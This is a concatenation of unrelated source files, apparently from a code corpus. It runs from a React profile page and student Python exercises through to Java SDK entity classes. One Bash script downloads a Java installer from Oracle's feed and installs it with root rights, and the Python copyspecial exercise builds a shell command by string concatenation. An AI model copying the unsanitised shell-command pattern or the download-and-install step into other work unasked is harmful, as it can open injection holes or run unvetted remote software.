import ProfileImg from '../components/about/ProfileImg';
import mentor from '../asset/icon/mentor2.png';
import leader from '../asset/icon/leader2.png';
import hackathon from '../asset/icon/hackathon2.png';
import code from '../asset/icon/code2.png';
import Career from '../components/about/Career';
import SideProject from '../components/about/SideProject';
import Active from '../components/about/Active';
import TechStack from '../components/about/TechStack';
const AboutMe = () => {
const career = [
{
period: '2020.11',
job: 'startup co-founder Front-End Dev',
project:
'React,Redux,React-Saga를 활용하여 store정보를 입력,수정, 보여주는 Product 제작',
current: true,
},
{
period: '2019.11',
job: 'Pusan Likelion Works Teacher',
project:
'HTML,CSS, Python, Django를 기본으로 한 web develop 기초 교육(1,2,3기 진행)',
current: true,
},
{
period: '2020.10 \n 2020.11',
job: 'startup Front-End Dev',
project: 'react와 redux를 이용하여 영양제 제조 service 개발, ',
current: false,
},
{
period: '2019.11 \n 2020.06',
job: 'startup FullStack Dev',
project:
'Django와 AWS(EC2,LB,Route53)이용한 full community Site 제작 및 운영',
current: false,
},
];
const sideproject = [
{
period: '2020.12',
name: 'UMK MBTI TEST \n (React, Redux, amplify)',
direction: 'top',
},
{
period: '2020.09',
name: 'AngelHack \n (Django)',
direction: 'bottom',
},
{
period: '2020.04',
name: '선거 정보 알림 서비스 \n (Django,EC2)',
direction: 'top',
},
{
period: '2020.03',
name: 'PNU LL Apply Page \n (Django, BootStrap)',
direction: 'bottom',
},
{
period: '2019.10',
name: 'To do Love \n Play Store 출시 \n (RN)',
direction: 'top',
},
];
const active = [
{
icon: mentor,
desc:
'청소년 대상 프로그래밍 멘토링 진행 KB국민은행 X 멋쟁이사자처럼',
},
{
icon: hackathon,
desc: '다수 해커톤에 재미있게 참여했지만 수상은 😢',
},
{
icon: code,
desc:
'Django 공식 Repo에 debugging PR을 날렸지만 다른분이 PR 빼앗아가서 슬픔',
},
{
icon: leader,
desc: '부산 멋쟁이사자처럼 7기 대표',
},
];
const stack = [
{
name: 'HTML/CSS',
desc: '요청한 모든 디자인 구현 가능',
score: 6,
},
{
name: 'JS',
desc: 'Vanilla JS로 DOM조작을 통한 Interaction',
score: 2,
},
{
name: 'Django',
desc: 'Web Service를 Full로 만들 수 있고, 수업 가능',
score: 4,
},
{
name: 'Git',
desc: '협업을 하는데 무리없음, 필요한 부분 찾아서 적용가능',
score: 2,
},
{
name: 'AWS',
desc:
'Route 53, Amplify, EC2, ELB, EB 등을 사용해보고, 관심도 많음',
score: 0.5,
},
{
name: 'React',
desc: 'Redux, Redux-Saga를 사용하여 기본적인 SPA 작성가능.',
score: 2,
},
{
name: 'RN',
desc:
'LocalStorage를 이용해 Gamification이 적용된 TodoApp PlayStore에 출시.',
score: 1,
},
{
name: 'Gatsby',
desc:
'공식문서를 읽고, 다른 블로그를 참고하여 본인만의 정적 Site 생성.',
score: 2,
},
{
name: 'ML',
desc: '관심이 있어 책을 3권째 읽고 틈틈히 공부를 하려는 시도 중.',
score: 0.25,
},
];
const myValues = [
'- 구글링으로 해결 못할 것은 없다.',
'- 선한 영향을 주는 개발자가 되자',
];
const totalEffect = 205000;
const student = 100;
return (
<>
<SEO title="About-Me" />
<Layout about>
<LeftSection>
<Career career={career} />
</LeftSection>
<RightSection>
<SideProject sideproject={sideproject} />
<Active active={active} />
<TechStack stack={stack} />
</RightSection>
</Layout>
</>
);
};
export default AboutMe;
const LeftSection = styled.section`
flex: 1;
background: white;
/* rgba(199, 245, 147, 0.4),
rgba(245, 211, 162, 0.4)*/
background: linear-gradient(
to right bottom,
rgba(255, 255, 255, 0.5),
rgba(255, 255, 255, 0.2)
);
padding: 3rem;
@media (max-width: 1024px) {
flex: auto;
border-radius: 0 0 1.5rem 1.5rem;
}
@media (max-width: 475px) {
padding: 1rem;
}
`;
const RightSection = styled.section`
flex: 2;
display: flex;
padding: 2rem;
flex-direction: column;
align-items: flex-start;
justify-content: space-between;
@media (max-width: 1024px) {
flex: auto;
}
`;
|
<reponame>srudqvist/AlgorithmsProgrammingAssignments<gh_stars>0
### File: BruteForceStringMatching.py
### Author: <NAME>
### CSCI 0262 Algorithms
###
###
###
### Modification Log:
###
###
### ---------------------------------------------------
### PART A BRUTE FORCE STRING MATCHING
### ---------------------------------------------------
def stringMatching(longText, searchString):
try:
if longText.isspace():
print("Check the input, longText is only spaces.")
if longText == "":
print("No long string")
return -1
if searchString == "":
print("No search string")
return -1
longTextLength = int(len(longText))
searchStringLength = int(len(searchString))
stringLength = longTextLength - searchStringLength
# Loop search through the longText string looking for the characters in searchString.
for posInText in range(0, stringLength + 1):
stringIndex = 0
while stringIndex < searchStringLength and searchString[stringIndex] == longText[posInText + stringIndex]:
stringIndex = stringIndex + 1
if stringIndex == searchStringLength:
return posInText
return -1
except:
print("Check the input, this function only takes strings")
print("Returned -1 since this test should fail since there is no string matching")
return -1
### ---------------------------------------------------
### PART B FIND THE LAST OCCURENCE
### ---------------------------------------------------
def findLast(longText, searchString):
try:
if longText.isspace():
print("Check the input, longText is only spaces.")
if longText == "":
print("Check the input, there is no long string.")
return -1
if searchString == "":
print("Check the input, there is no search string.")
return -1
longTextLength = int(len(longText))
searchStringLength = int(len(searchString))
stringLength = longTextLength - searchStringLength
lastOccurrence = 0
for posInText in range(0, stringLength + 1):
stringIndex = 0
while stringIndex < searchStringLength and searchString[stringIndex] == longText[posInText + stringIndex]:
stringIndex = stringIndex + 1
# lastOccurence is the last occurrence that has been reached so far.
if stringIndex == searchStringLength:
lastOccurrence = posInText
# When the entire string has been looped through, check if there has been an occurence
# if not, return -1.
if posInText == stringLength:
if lastOccurrence == 0:
return -1
return lastOccurrence
return -1
except:
print("Check the input, this function only takes strings")
print("Returned -1 since this test should fail since there is no string matching")
return -1
def testCaseA(testNumber,longText,searchString,expectedResult):
actualResult = stringMatching(longText,searchString)
if actualResult == expectedResult:
print ("Test",testNumber,"passed.")
else:
print ("Test",testNumber,"failed. Expected",expectedResult, "but found",actualResult)
def testA():
testCaseA(1,"Oh I wish I were an aardvark.","were",12)
testCaseA(2,"Oh I wish I were an aardvark.","join",-1)
testCaseA(3,"She sells sea shells by the seashore.","seashore",28)
testCaseA(4, "Testing a STr1nG with uppercase and numbers", "string", -1)
testCaseA(5, 123456, 23, -1)
testCaseA(6, "<NAME>", "e", 10)
def testCaseB(testNumber,longText,searchString,expectedResult):
actualResult = findLast(longText,searchString)
if actualResult == expectedResult:
print ("Test",testNumber,"passed.")
else:
print ("Test",testNumber,"failed. Expected",expectedResult, "but found",actualResult)
def testB():
testCaseB(1,"Oh I wish I were an aardvark.","I w",10)
testCaseB(2,"Oh I wish I were an aardvark.","anteater",-1)
testCaseB(3,"She sells sea shells by the seashore.","sea",28)
testCaseB(4, "So so So so So So soSo many occurrences here", "So", 20)
testCaseB(5, "", "", -1)
testCaseB(6, "hello there", "e", 10)
testA()
testB()
|
from flask import Blueprint, request
from services import blog_service
from models.blog import Blog, BlogSchema
blog_api = Blueprint('blog_api', __name__)
@blog_api.route('/', methods=['GET'])
def all():
requestedPage = int(request.args.get('page'))
blog = blog_service.page(requestedPage)
if blog is None:
return {}
return BlogSchema().dumps(blog).data
|
#!/usr/bin/env bash
# @file Interaction
# @brief Functions to enable interaction with the user.
# @description Prompt yes or no question to the user.
#
# @example
# interaction::prompt_yes_no "Are you sure to proceed" "yes"
# #Output
# Are you sure to proceed (y/n)? [y]
#
# @arg $1 string The question to be prompted to the user.
# @arg $2 string default answer \[yes/no\] (optional).
#
# @exitcode 0 If user responds with yes.
# @exitcode 1 If user responds with no.
# @exitcode 2 Function missing arguments.
interaction::prompt_yes_no() {
[[ $# = 0 ]] && printf "%s: Missing arguments\n" "${FUNCNAME[0]}" && return 2
declare def_arg response
def_arg=""
response=""
case "${2}" in
[yY] | [yY][eE][sS])
def_arg=y
;;
[nN] | [nN][oO])
def_arg=n
;;
esac
while :; do
printf "%s (y/n)? " "${1}"
[[ -n "${def_arg}" ]] && printf "[%s] " "${def_arg}"
read -r response
[[ -z "${response}" ]] && response="${def_arg}"
case "${response}" in
[yY] | [yY][eE][sS])
response=y
break
;;
[nN] | [nN][oO])
response=n
break
;;
*)
response=""
;;
esac
done
[[ "${response}" = 'y' ]] && return 0 || return 1
}
# @description Prompt question to the user.
#
# @example
# interaction::prompt_response "Choose directory to install" "/home/path"
# #Output
# Choose directory to install? [/home/path]
#
# @arg $1 string The question to be prompted to the user.
# @arg $2 string default answer (optional).
#
# @exitcode 0 If user responds with answer.
# @exitcode 2 Function missing arguments.
#
# @stdout User entered answer to the question.
interaction::prompt_response() {
[[ $# = 0 ]] && printf "%s: Missing arguments\n" "${FUNCNAME[0]}" && return 2
declare def_arg response
response=""
def_arg="${2}"
while :; do
printf "%s ? " "${1}"
[[ -n "${def_arg}" ]] && [[ "${def_arg}" != "-" ]] && printf "[%s] " "${def_arg}"
read -r response
[[ -n "${response}" ]] && break
if [[ -z "${response}" ]] && [[ -n "${def_arg}" ]]; then
response="${def_arg}"
break
fi
done
[[ "${response}" = "-" ]] && response=""
printf "%s" "${response}"
}
|
<filename>copyspecial/copyspecial.py
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import commands
"""Copy Special exercise
"""
def get_special_path(directory):
# To get a list of paths of special files i.e filenames containing leading and trailing '__'
special_paths = []
files = os.listdir(directory)
for filename in files:
special_check = re.search(r'__(\w+)__', filename)
if special_check:
file_path = os.path.abspath(filename)
special_paths.append(file_path)
return special_paths
def copy_to(paths, directory):
# To copy the special files to dir
if not os.path.exists(directory):
os.mkdir(directory)
for path in paths:
shutil.copy(path, directory)
def zip_to(paths, zippath):
# To zip all the files
cmd = 'zip -j ' + zippath + ' ' + ' '.join(paths)
(status, out) = commands.getstatusoutput(cmd)
if status:
sys.stderr.write(output)
sys.exit()
else:
print "ZipFile created"
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
paths = []
for dirname in args:
paths.extend(get_special_path(dirname))
if todir:
copy_to(paths, todir)
elif tozip:
zip_to(paths, tozip)
else:
print '\n'.join(paths)
if __name__ == "__main__":
main()
|
<gh_stars>0
import { createServer, proxy } from 'aws-serverless-express';
import { APIGatewayProxyEvent, Context } from 'aws-lambda';
import { createApp } from './app';
const server = createServer(createApp(), undefined);
export default function(event: APIGatewayProxyEvent, context: Context) {
console.log(`Event: ${JSON.stringify(event)}`);
return proxy(server, event, context);
}
|
/**@auther <NAME>
* CSS342 Algorithms and Data Structures
* edited from "Objects and Classes Lecture by Professor <NAME>"
*/
#include <iostream>
#include "rat2.h"
using namespace std;
int main(){
Rational x(-2,6), y(-14,-16), z;
cout << x << " + " << y;
z = x + y;
cout << " = " << z << endl;
cout << x << " - " << y;
z = x - y;
cout << " = " << z << endl;
cout << x << " * " << y;
z = x * y;
cout << " = " << z << endl;
cout << x << " * " << y;
z = x - y;
cout << " * " << z << endl;
Rational a;
cin >> a;
cout << "Your Rational was " << a << endl;
return 0;
}
|
<filename>eval.py
# -*- coding: utf-8 -*-
"""
学習済みモデルを評価するためのモジュール。
要学習済みモデルファイル。
python eval.py を実行すると、標準出力に平均報酬値が出力される。
"""
from time import time
from stable_baselines3 import PPO
from envs import EvalEnv, Player, ProbPlayer, JurinaPlayer, AIPlayer
# 学習済みモデルファイルパス
PROP_PPO = 'prob_ppo'
PA_PPO = 'pa_ppo'
POLICY_PPO = 'policy_ppo'
PATHS = [PROP_PPO, PA_PPO, POLICY_PPO]
def eval_ppo(env_player, path=PROP_PPO, steps=100, debug=True):
"""
学習済み方策PPOを100ステップ実行し、
平均収益を表示する。
引数:
env_player 評価環境側のプレイヤーインスタンス
path ロードする方策側学習済みモデルファイルパス
steps ステップ実行回数
debug Trueの場合毎ステップ表示する
戻り値:
なし
"""
# 評価用環境の生成
env = EvalEnv(env_player)
# 評価対象学習済み方策モデルの復元
model = PPO.load(path)
# エピソード開始時の観測を取得
observation = env.reset()
# 収益リスト初期化
revenue = []
# エピソード数
episodes = 0
# 処理時間計測
elapsed = time()
for _ in range(steps):
policy_action = model.predict(observation)
if isinstance(policy_action, tuple):
policy_action = policy_action[0]
policy_action = int(policy_action)
observation, reward, done, info = env.step(policy_action)
if debug:
env.render()
if done:
revenue.append(reward)
episodes = info['episode_no']
observation = env.reset()
print(f'** path:{path} test')
if debug:
print(f' env player {env_player.__class__.__name__}')
print(f' ran {steps} steps, {time() - elapsed} sec')
if debug:
print(f' {episodes} episodes done')
if len(revenue) <= 0:
print(f' no revenues')
else:
print(f' revenue average: {sum(revenue)/len(revenue)} per episodes')
if __name__ == '__main__':
"""
学習済みモデルの平均報酬値を出力する。
"""
# ステップ数リスト
step_list = [10, 100, 1000, 10000]
# 評価環境側プレイヤーリスト
players = [Player(), ProbPlayer(), JurinaPlayer(), AIPlayer(PPO.load(PROP_PPO))]
debug = False
print('*****************************')
for steps in step_list:
for path in PATHS:
for player in players:
print(f'*** steps={steps}, path={path}, player={player.__class__.__name__}')
eval_ppo(env_player=player, path=path, steps=steps, debug=debug)
print('*****************************')
|
<reponame>quintel/etengine
# Creates a fake graph, API, and area capable of being used in calculations
# relating to household heat, EVs, and other curves.
module HouseholdCurvesHelper
# Public: Creates a household heat curve set
def create_curve_set(dataset: :nl, variant: 'default')
Atlas::Dataset.find(dataset).curve_sets.get('weather').variant(variant)
end
# Public: Creates a basic graph, graph API, and area stub.
def create_graph(**area_attributes)
area_attributes = { area_code: :nl }.merge(area_attributes)
graph = instance_double(
Qernel::Graph,
query: instance_double(Qernel::GraphApi::Energy),
area: instance_double(Qernel::Area, area_attributes)
)
allow(graph).to receive(:dataset_get)
.with(:custom_curves)
.and_return(Gql::CustomCurveCollection.new({}))
graph
end
end
|
<filename>opentaps/opentaps-common/src/common/org/opentaps/gwt/common/server/form/CustomServiceValidationException.java
/*
* Copyright (c) Open Source Strategies, Inc.
*
* Opentaps is free software: you can redistribute it and/or modify it
* under the terms of the GNU Affero General Public License as published
* by the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Opentaps is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with Opentaps. If not, see <http://www.gnu.org/licenses/>.
*/
package org.opentaps.gwt.common.server.form;
import org.ofbiz.service.ServiceValidationException;
import java.util.List;
import java.util.Map;
import java.util.HashMap;
/**
* An extension of <code>ServiceValidationException</code> that also support custom field error messages.
*/
public class CustomServiceValidationException extends ServiceValidationException {
private Map<String, String> customFieldsErrors = new HashMap<String, String>();
/**
* Creates a new <code>CustomServiceValidationException</code> instance.
* @param missingFields the list of missing fields
* @param extraFields the list of extra fields
* @param customFieldsErrors the <code>Map</code> of fields and their custom error messages
*/
public CustomServiceValidationException(List<String> missingFields, List<String> extraFields, Map<String, String> customFieldsErrors) {
super("Validation Error", null, missingFields, extraFields, "IN");
if (customFieldsErrors != null) {
this.customFieldsErrors = customFieldsErrors;
}
}
/**
* Gets the <code>Map</code> of fields and their custom error messages.
* @return the <code>Map</code> of fields and their custom error messages
*/
public Map<String, String> getCustomFieldsErrors() {
return customFieldsErrors;
}
}
|
package steuerung;
import java.util.List;
import modell.Fassade;
import modell.formel.Formel;
public class FormelEingeben extends WahrheitstabellenBefehl {
private int spalte;
private String alteFormel;
private String alteFormelRep;
private List<String> atomareAussagen;
/**
* Der Konstruktor, f�r die Befehl, der den Befehl auch direkt ausf�hrt.
*
* @param model die Fassade auf die der Befehl zugreift.
* @param spalte die Spalte in der die Formel ge�ndert werden soll.
*/
public FormelEingeben(Fassade model, int spalte) {
super(model);
this.spalte = spalte;
hohleDaten();
setzeDaten();
}
/**
* Hohlt die alte Formel und die atomaren Aussagen von der Fasssade.
*/
public void hohleDaten() {
alteFormel = model.gibFormelParsabel(spalte);
alteFormelRep = model.gibFormelText(spalte);
atomareAussagen = model.gibAtomareAussage();
}
/**
* Ruf das Dialogfenster auf, in dem man die Formel editieren kann, und
* �bertr�gt die neue Formel, �ber die Fassade, zum Modell.
*/
public void setzeDaten() {
FormelEditor fe = new FormelEditor(atomareAussagen);
String neueFormel = fe.gibNeueFormel(alteFormel, alteFormelRep);
if (neueFormel.equals("-1") || neueFormel.equals("")) {
return;
}
Formel neueFormelF = FormelParser.pars(neueFormel, model);
model.setzeFormel(neueFormelF, spalte);
}
}
|
from abc import ABC, abstractmethod
from typing import Any, Dict, List, Union, Mapping, Optional
try:
from sqlalchemy.engine import Engine
from sqlalchemy import MetaData, Table
from databases import Database as EncodeDatabase
from sqlalchemy.sql import ClauseElement
from sqlalchemy.engine.result import RowProxy
except:
sa = None
Engine = None
Table = None
MetaData = None
EncodeDatabase = None
ClauseElement = None
RowProxy = None
from uvicore.contracts import DbQueryBuilder
from .connection import Connection
from .package import Package
class Database(ABC):
pass
@property
@abstractmethod
def default(self) -> str:
"""The default connection str for the main running app"""
pass
@property
@abstractmethod
def connections(self) -> Dict[str, Connection]:
"""All connections from all packages, keyed by connection str name"""
pass
@property
@abstractmethod
def engines(self) -> Dict[str, Engine]:
"""All engines for all unique (by metakey) connections, keyed by metakey"""
pass
@property
@abstractmethod
def databases(self) -> Dict[str, EncodeDatabase]:
"""All Encode Databases for all unique (by metakey) connections, keyed by metakey"""
pass
@property
@abstractmethod
def metadatas(self) -> Dict[str, MetaData]:
"""All SQLAlchemy Metadata for all unique (by metakey) connections, keyed by metakey"""
pass
@abstractmethod
def init(self, default: str, connections: List[Connection]) -> None:
"""Initialize the database system with a default connection str and List of all Connections from all packages"""
pass
@abstractmethod
def packages(self, connection: str = None, metakey: str = None) -> List[Package]:
"""Get all packages with the metakey (direct or derived from connection str)."""
pass
@abstractmethod
def metakey(self, connection: str = None, metakey: str = None) -> str:
"""Get one metekay by connection str or metakey"""
pass
@abstractmethod
def connection(self, connection: str = None) -> Connection:
"""Get one connection by connection name"""
pass
@abstractmethod
def metadata(self, connection: str = None, metakey: str = None) -> MetaData:
"""Get one SQLAlchemy Metadata by connection str or metakey"""
pass
@abstractmethod
def table(self, table: str, connection: str = None) -> Table:
"""Get one SQLAlchemy Table by name (without prefix) and connection str or connection.tablename dot notation"""
pass
@abstractmethod
def tablename(self, table: str, connection: str = None) -> str:
"""Get a SQLAlchemy tablename with prefix by name (without prefix) and connection str or connection.tablename dot notation"""
pass
@abstractmethod
def engine(self, connection: str = None, metakey: str = None) -> Engine:
"""Get one SQLAlchemy Engine by connection str or metakey"""
pass
@abstractmethod
async def database(self, connection: str = None, metakey: str = None) -> EncodeDatabase:
"""Get one Encode Database by connection str or metakey"""
pass
@abstractmethod
async def disconnect(self, connection: str = None, metakey: str = None, from_all: bool = False) -> None:
"""Disconnect from a database by connection str or metakey. Of ALL databases."""
pass
@abstractmethod
async def fetchall(self, query: Union[ClauseElement, str], values: Dict = None, connection: str = None, metakey: str = None) -> List[RowProxy]:
"""Fetch List of records from a SQLAlchemy Core Query based on connection str or metakey"""
pass
@abstractmethod
async def fetchone(self, query: Union[ClauseElement, str], values: Dict = None, connection: str = None, metakey: str = None) -> Optional[RowProxy]:
"""Fetch one record from a SQLAlchemy Core Query based on connection str or metakey"""
pass
@abstractmethod
async def execute(self, query: Union[ClauseElement, str], values: Union[List, Dict] = None, connection: str = None, metakey: str = None) -> Any:
"""Execute a SQLAlchemy Core Query based on connection str or metakey"""
pass
@abstractmethod
def query(self, connection: str = None) -> DbQueryBuilder[DbQueryBuilder, None]:
"""Database query builder passthrough"""
# @property
# @abstractmethod
# def events(self) -> Dict: pass
# @property
# @abstractmethod
# def listeners(self) -> Dict[str, List]: pass
# @property
# @abstractmethod
# def wildcards(self) -> List: pass
# @abstractmethod
# def register(self, events: Dict):
# pass
# @abstractmethod
# def listen(self, events: Union[str, List], listener: Any) -> None:
# pass
# @abstractmethod
# def dispatch(self, event: Any, payload = {}) -> None:
# pass
# @abstractmethod
# def get_listeners(self, event: str) -> List:
# pass
|
<gh_stars>1-10
import sys
from typing import Type
from dataclasses import dataclass
from requests import get, Response
from search_strategies import SearchStrategy
from search_strategies import LinearSearchStrategy
@dataclass
class OUISearch:
oui_item: str
oui_response: Type[Response]
def __repr__(self):
return self.oui_item
def search(self, searching_strategy: Type[SearchStrategy]):
return searching_strategy.search(
self.oui_item,
self.oui_response
)
if __name__ == '__main__':
response: Response = get('https://gitlab.com/wireshark/wireshark/-/raw/master/manuf')
try:
oui_search = OUISearch(sys.argv[1], response)
print(f'\n\n{oui_search.search(LinearSearchStrategy)}\n\n')
except IndexError:
print('Please specify the MAC address for the search like so: python oui.py 00:00:00')
|
#!/bin/bash
# This script downloads and installs the latest Oracle Java 8 for compatible Macs
# Determine OS version
osvers=$(sw_vers -productVersion | awk -F. '{print $2}')
# Specify the "OracleUpdateXML" variable by adding the "SUFeedURL" value included in the
# /Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Info.plist file.
#
# Note: The "OracleUpdateXML" variable is currently specified in the script as that for
# Java 8 Update 20, but the XML address embedded with Java 8 Update 20 is not special in
# this regard. I have verified that using the address for Java 8 Update 5 will also work
# to pull the address of the latest Oracle Java 8 installer disk image. To get the "SUFeedURL"
# value embedded with your currently installed version of Java 8 on Mac OS X, please run
# the following command in Terminal:
#
# defaults read "/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Info" SUFeedURL
#
# As of Java 8 Update 20, that produces the following return:
#
# https://javadl-esd-secure.oracle.com/update/mac/au-1.8.0_20.xml
#
OracleUpdateXML="https://javadl-esd-secure.oracle.com/update/mac/au-1.8.0_20.xml"
# Use the XML address defined in the OracleUpdateXML variable to query Oracle via curl
# for the complete address of the latest Oracle Java 8 installer disk image.
fileURL=`/usr/bin/curl --silent $OracleUpdateXML | awk -F \" /enclosure/'{print $(NF-1)}'`
# Specify name of downloaded disk image
java_eight_dmg="$3/tmp/java_eight.dmg"
if [[ ${osvers} -lt 7 ]]; then
echo "Oracle Java 8 is not available for Mac OS X 10.6.8 or earlier."
fi
if [[ ${osvers} -ge 7 ]]; then
# Download the latest Oracle Java 8 software disk image
# The curl -L option is needed because there is a redirect
# that the requested page has moved to a different location.
/usr/bin/curl --retry 3 -Lo "$java_eight_dmg" "$fileURL"
# Specify a /tmp/java_eight.XXXX mountpoint for the disk image
TMPMOUNT=`/usr/bin/mktemp -d "$3"/tmp/java_eight.XXXX`
# Mount the latest Oracle Java 8 disk image to /tmp/java_eight.XXXX mountpoint
hdiutil attach "$java_eight_dmg" -mountpoint "$TMPMOUNT" -nobrowse -noverify -noautoopen
# Install Oracle Java 8 from the installer package. This installer may
# be stored inside an install application on the disk image, or there
# may be an installer package available at the root of the mounted disk
# image.
if [[ -e "$(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))" ]]; then
pkg_path="$(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))"
elif [[ -e "$(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*\.app \))" ]]; then
oracle_app=`(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*\.app \))`
if [[ -e "$(/usr/bin/find "$oracle_app"/Contents/Resources -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))" ]]; then
pkg_path="$(/usr/bin/find "$oracle_app"/Contents/Resources -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))"
fi
fi
# Before installation, the installer's developer certificate is checked to
# see if it has been signed by Oracle's developer certificate. Once the
# certificate check has been passed, the package is then installed.
if [[ "${pkg_path}" != "" ]]; then
signature_check=`/usr/sbin/pkgutil --check-signature "$pkg_path" | awk /'Developer ID Installer/{ print $5 }'`
if [[ ${signature_check} = "Oracle" ]]; then
# Install Oracle Java 8 from the installer package stored inside the disk image
/usr/sbin/installer -dumplog -verbose -pkg "${pkg_path}" -target "$3"
fi
fi
# Clean-up
# Unmount the Oracle Java 8 disk image from /tmp/java_eight.XXXX
/usr/bin/hdiutil detach -force "$TMPMOUNT"
# Remove the /tmp/java_eight.XXXX mountpoint
/bin/rm -rf "$TMPMOUNT"
# Remove the downloaded disk image
/bin/rm -rf "$java_eight_dmg"
fi
exit 0
|
<gh_stars>0
package com.bullhornsdk.data.model.entity.core.standard;
import com.bullhornsdk.data.api.helper.RestOneToManySerializer;
import com.bullhornsdk.data.model.entity.core.customobject.*;
import com.bullhornsdk.data.model.entity.core.type.AssociationEntity;
import com.bullhornsdk.data.model.entity.core.type.CreateEntity;
import com.bullhornsdk.data.model.entity.core.type.DateLastModifiedEntity;
import com.bullhornsdk.data.model.entity.core.type.EditHistoryEntity;
import com.bullhornsdk.data.model.entity.core.type.FileEntity;
import com.bullhornsdk.data.model.entity.core.type.QueryEntity;
import com.bullhornsdk.data.model.entity.core.type.SearchEntity;
import com.bullhornsdk.data.model.entity.core.type.UpdateEntity;
import com.bullhornsdk.data.model.entity.customfields.CustomFieldsB;
import com.bullhornsdk.data.model.entity.embedded.Address;
import com.bullhornsdk.data.model.entity.embedded.OneToMany;
import com.bullhornsdk.data.model.entity.embedded.OneToManyLinkedId;
import com.bullhornsdk.data.util.ReadOnly;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonPropertyOrder;
import com.fasterxml.jackson.annotation.JsonRootName;
import com.fasterxml.jackson.databind.annotation.JsonSerialize;
import org.joda.time.DateTime;
import javax.validation.constraints.Size;
import java.math.BigDecimal;
@JsonInclude(JsonInclude.Include.NON_NULL)
@JsonRootName(value = "data")
@JsonPropertyOrder({ "id", "address", "annualRevenue", "billingAddress", "billingContact", "billingFrequency", "billingPhone",
"branch", "businessSectorList", "certifications", "requirements", "certificationGroups", "childClientCorporations", "clientContacts",
"companyDescription", "companyURL", "competitors", "culture", "customDate1", "customDate2", "customDate3", "customFloat1", "customFloat2",
"customFloat3", "customInt1", "customInt2", "customInt3", "customText1", "customText10", "customText11", "customText12", "customText13",
"customText14", "customText15", "customText16", "customText17", "customText18", "customText19", "customText2", "customText20",
"customText3", "customText4", "customText5", "customText6", "customText7", "customText8", "customText9", "customTextBlock1",
"customTextBlock2", "customTextBlock3", "customTextBlock4", "customTextBlock5", "dateAdded", "dateFounded", "dateLastModified", "department",
"externalID", "fax", "feeArrangement", "funding", "industryList", "invoiceFormat", "leads", "linkedinProfileName", "name", "notes", "numEmployees", "numOffices",
"ownership", "parentClientCorporation", "phone", "revenue", "status", "taxRate", "tickerSymbol", "trackTitle", "workWeekStart",
"customObject1s", "customObject2s", "customObject3s", "customObject4s", "customObject5s", "customObject6s", "customObject7s",
"customObject8s", "customObject9s", "customObject10s" })
public class ClientCorporation extends CustomFieldsB implements QueryEntity, UpdateEntity, CreateEntity, FileEntity, AssociationEntity,
SearchEntity, DateLastModifiedEntity, EditHistoryEntity {
private Integer id;
private Address address;
private BigDecimal annualRevenue;
private Address billingAddress;
@JsonIgnore
@Size(max = 100)
private String billingContact;
@JsonIgnore
@Size(max = 20)
private String billingFrequency;
@JsonIgnore
@Size(max = 20)
private String billingPhone;
private Branch branch;
@JsonIgnore
private String businessSectorList;
private OneToMany<ClientCorporation> childClientCorporations;
private OneToMany<ClientContact> clientContacts;
@JsonIgnore
private String companyDescription;
@JsonIgnore
@Size(max = 100)
private String companyURL;
@JsonIgnore
private String competitors;
@JsonIgnore
private String culture;
private DateTime dateAdded;
private DateTime dateFounded;
private DateTime dateLastModified;
private CorporationDepartment department;
@JsonIgnore
private String externalID;
@JsonIgnore
private String fax;
private BigDecimal feeArrangement;
@JsonIgnore
private String funding;
@JsonIgnore
private String industryList;
@JsonIgnore
private String invoiceFormat;
private OneToMany<Lead> leads;
@JsonIgnore
@Size(max = 200)
private String linkedinProfileName;
@JsonIgnore
@Size(max = 100)
private String name;
@JsonIgnore
private String notes;
private Integer numEmployees;
private Integer numOffices;
@JsonIgnore
@Size(max = 30)
private String ownership;
private OneToManyLinkedId owners;
private ClientCorporation parentClientCorporation;
@JsonIgnore
@Size(max = 20)
private String phone;
@JsonIgnore
private String revenue;
@JsonIgnore
@Size(max = 30)
private String status;
private BigDecimal taxRate;
@JsonIgnore
@Size(max = 20)
private String tickerSymbol;
@JsonIgnore
@Size(max = 200)
private String trackTitle;
private Integer workWeekStart;
private OneToMany<Certification> requirements;
private OneToMany<CertificationGroup> certificationGroups;
private OneToMany<ClientCorporationCertification> certifications; // legacy certifications
private OneToMany<ClientCorporationCustomObjectInstance1> customObject1s;
private OneToMany<ClientCorporationCustomObjectInstance2> customObject2s;
private OneToMany<ClientCorporationCustomObjectInstance3> customObject3s;
private OneToMany<ClientCorporationCustomObjectInstance4> customObject4s;
private OneToMany<ClientCorporationCustomObjectInstance5> customObject5s;
private OneToMany<ClientCorporationCustomObjectInstance6> customObject6s;
private OneToMany<ClientCorporationCustomObjectInstance7> customObject7s;
private OneToMany<ClientCorporationCustomObjectInstance8> customObject8s;
private OneToMany<ClientCorporationCustomObjectInstance9> customObject9s;
